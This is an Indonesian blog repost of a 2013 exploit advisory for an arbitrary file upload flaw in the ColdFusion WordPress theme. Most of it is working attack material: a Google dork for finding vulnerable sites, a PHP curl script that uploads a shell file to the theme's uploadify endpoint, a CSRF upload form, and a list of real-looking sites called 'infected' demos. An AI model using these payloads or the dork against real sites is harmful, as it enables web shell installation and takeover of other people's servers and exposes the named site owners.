WordPress theme ColdFusion Arbitrary File Upload Vulnerability - Hallo sahabat Minato ET, Pada Artikel yang anda baca kali ini dengan judul WordPress theme ColdFusion Arbitrary File Upload Vulnerability, kami telah mempersiapkan artikel ini dengan baik untuk anda baca dan ambil informasi didalamnya. mudah-mudahan isi postingan Artikel Arbitrary, Artikel Old, Artikel Wordpress, yang kami tulis ini dapat anda pahami. baiklah, selamat membaca.

Judul : WordPress theme ColdFusion Arbitrary File Upload Vulnerability
link : WordPress theme ColdFusion Arbitrary File Upload Vulnerability

WordPress theme ColdFusion Arbitrary File Upload Vulnerability

#-Title: WordPress theme ColdFusion Arbitrary File Upload Vulnerability

#-Author: Smail Max / Bet0

#-Date: 10/31/2013

#- Vendor : themeforest. net

#- Link Download : themeforest. net/item/coldfusion-responsive-fullscreen-video-image-audio/4381748

#-Google Dork: inurl:wp-content/themes/ColdFusion

#- Tested on : Win7, Linux

#- Fixed in ??

////////////////////////////////////////////////////////////////////////////////////////////

Information of Bug : 

Bugtraq ID: 63523

Class: Input Validation Error

CVE: -

Remote: Yes

Local: No

Published: Nov 01 2013 12:00AM

Updated: Nov 01 2013 12:00AM

Credit: Bet0

When Vulnerable: {"status":"NOK", "ERR":"This file is incorect"}

Description : 

The ColdFusion Theme for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. 

An attacker can exploit this issue to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access to the application; other attacks are also possible.

Solution:

Currently, we are not aware of any vendor-supplied patches.

-- Proof Of Concept --

With Remote Code :

<?php
$uploadfile="3xploi7.php";
$ch = curl_init("http://localcrot/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

With CSRF :

<form
action="http://localcrot/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="3xploi7ed !">
</form>

If Succesfully (with CSRF) : 

Shell Path : Here

Site Demo (Infected) :

http://www.laughinXgcowproductions.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php

http://www.alias-phXoto.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php

http://www.manueXl-portela.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php

Demikianlah Artikel WordPress theme ColdFusion Arbitrary File Upload Vulnerability

Sekianlah artikel WordPress theme ColdFusion Arbitrary File Upload Vulnerability kali ini, mudah-mudahan bisa memberi manfaat untuk anda semua. baiklah, sampai jumpa di postingan artikel lainnya.

Anda sekarang membaca artikel WordPress theme ColdFusion Arbitrary File Upload Vulnerability dengan alamat link https://minatoet.blogspot.com/2015/11/wordpress-theme-coldfusion-arbitrary.html

Tweet